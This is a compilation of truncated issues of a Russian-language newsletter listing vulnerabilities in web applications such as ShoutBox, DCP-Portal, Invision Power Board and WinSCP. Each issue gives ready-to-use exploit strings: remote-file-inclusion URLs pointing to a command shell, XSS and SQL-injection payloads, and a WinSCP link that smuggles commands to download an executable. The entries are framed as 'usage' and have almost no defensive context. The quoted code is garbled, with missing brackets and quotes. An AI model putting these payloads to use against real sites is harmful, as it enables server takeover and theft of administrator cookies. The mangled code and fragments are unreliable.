Компьютер для продвинутых пользователей В этом выпуске: S H O U T B O X ПО: S H O U T B O X Версия: 1.5 Уязвимость: Уязвимость заключается в возможности выполнять произвольный код на сервере. Код: $this_dir = str_replace, '/, dirname_FILE); include$this_dir/config.inc.php); if!isset$language) $language = 'en'; include$this_dir/lang$language.inc); include$this_dir/smilies.inc); Использование: http://www.victim.com/S H O U T B O X/shoutbox.inc.php?this_dir=Command-Shell Не забудьте проголосовать за выпуск! Р...

Компьютер для продвинутых пользователей В этом выпуске: Jobline ПО: Jobline Версия: 1.1.1 Уязвимость: Уязвимость заключается в возможности выполнять произвольный код на сервере. Код: if ( file_exists( $mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php" ) ) { include_once$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php); } else { include_once$mosConfig_absolute_path/components/$option/language/english.php); } Использование: http://www.victim.com/Jobline/admin.jo...

Компьютер для продвинутых пользователей В этом выпуске: VBZooM ПО: VBZooM Версия: 1.02 Использование: /meaning.php?Action=1...

Компьютер для продвинутых пользователей В этом выпуске: DCP-Portal ПО: DCP-Portal Версия: 6.1.х Уязвимость: Уязвимость заключается в возможности выполнить удаленную команду на сервере. Сам ошибочный код содержится в файле lib.php: include $root/library/lib_nav.php); include $root/library/lib_mods.php); include $root/library/lib_admin.php); include $root/library/lib_3rd.php); При этом переменная $root не проверяется. Использование: http://example/[dp_path]/library/lib.php?root[cmd_url] Не забудьте проголосо...

Компьютер для продвинутых пользователей В этом выпуске: Content-Builder ПО: Content-Builder Версия: 0.7.5 Использование: http://example/[cb_path]/cms/plugins/col_man/column.inc.php?lang_path[cmd_url]/ http://example/[cb_path]/cms/plugins/poll/poll.inc.php?lang_path[cmd_url]/ http://example/[cb_path]/cms/plugins/user_managment/usrPortrait.inc.php?lang_path[cmd_url]/ http://example/[cb_path]/cms/plugins/user_managment/user.inc.php?lang_path[cmd_url]/ http://example/[cb_path]/cms/plugins/media_manager/media.i...

Компьютер для продвинутых пользователей В этом выпуске: Invision Power Board ПО: Invision Power Board Версия: 2.1.6 Уязвимость: Некоторые параметры не проверяются, что даёт возможность провести XSS-атака и украсть куки администратора. Использование : http://localhost/forum/admin.php?phpinfo=<script>alert)</script> Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...

Компьютер для продвинутых пользователей В этом выпуске: CS-Forum ПО: CS-Forum Версия: 0.81 Использование : http://]/read.php?msg_result[XSS] http://]/read.php?rep_titre[XSS] Cookies: CSForum_nom[XSS]; CSForum_mail[XSS]; CSForum_url[XSS] * http://]/read.php?id=1[SQL_SELECT]...

Компьютер для продвинутых пользователей В этом выпуске: WinSCP ПО: WinSCP Версия: 3.8.1 О WinSCP: SFTP клиент для Windows использующий SSH и имеющий открытый код. Протокол Legacy SCP входит в поддержку. Уязвимость: Строка ввода (scp:// sftp://) не проверяется, что может нам обеспечить возможность вставлять любые команды. Если вы создадите HTML страницу со следующий содержанием: <a href"scp://user:password@host:22/%22%20/console%20/command%20%22lcd% 20c%22%20%22get%201.exe%22%20exit>download malware.exe&...

Компьютер для продвинутых пользователей В этом выпуске: Ringlink ПО: Ringlink Версия: 3.2 Сайт: http://www.ringlink.org Использование: http://www.example.com/ringlink/next.cgi?ringid[IMG%20SRC=javascript:alert'XSS] http://www.example.com/ringlink/stats.cgi?ringid[IMG%20SRC=javascript:alert'XSS] http://www.example.com/ringlink/list.cgi?ringid[IMG%20SRC=javascript:alert'XSS] Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: IC...

Компьютер для продвинутых пользователей В этом выпуске: MobeSpace ПО: MobeSpace Версия: 2.0 Сайт: http://mobescripts.com/ Уязвимость: Формы ввода: - Profile - Comments - Uploading a file to your locker - Posting in your blog - Creating a caption for your pic - Sending PM's Все эти формы не проверяются до генерации ответов. Так же возможно провести SQL-инъекцию. Это возможно из-за ошибки SQL синтаксиса. Использование: В форму вводу введите JavaScript код, например <IMG SRC=javascript:alert'XSS. SQL-Инъек...